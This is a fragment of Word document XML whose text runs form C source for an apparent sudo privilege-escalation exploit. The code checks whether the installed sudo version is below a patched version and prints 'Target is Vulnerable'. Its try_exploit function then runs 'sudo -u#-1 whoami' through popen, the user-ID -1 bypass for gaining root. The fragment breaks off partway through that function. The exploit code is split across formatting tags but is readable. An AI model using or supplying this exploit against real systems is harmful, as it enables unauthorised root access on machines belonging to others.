      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">("\033[32m[\033[34m+\033[32m] Version </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> %s\n",buffer2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A690A8" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    char *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>split_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strtok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2,"."</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F086062" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    while (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>split_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=NULL){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F668A41"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strcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3,split</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_version);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2ED28"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split_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strtok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL,".");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E0CFA8" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B1562" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version_integer_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atoi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1EC010AB" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version_patched</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atoi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VERSION_PATCH);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C2F36" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"My Version is %d",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version_integer_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC0236" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    /*if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer2,"1.8.27\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>")=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AD920E" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"[-] Vulnerable\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C90504" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D253CE" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version_integer_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>patched</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="03E5C827"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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>("\033[32m[\033[34m+\033[32m] Target is Vulnerable\n"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="213C2A21" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C29030A" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66624F" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>else{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2ED65C13" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"\033[31m[!] Target is Not Vulnerable\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097039D" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-1;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C729F82" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E39A3" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD5DBFC" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00652E1D" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A6C0AA" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A0117" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    char </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>buffer_try_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4096];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6848B495"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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>("\033[32m[\033[34m+\033[32m] Try Exploit...\n"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4844A12E" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FILE *payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u#-1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>","r");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE82E84"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fgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer_try_exploit,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4096,payload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654D3865" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
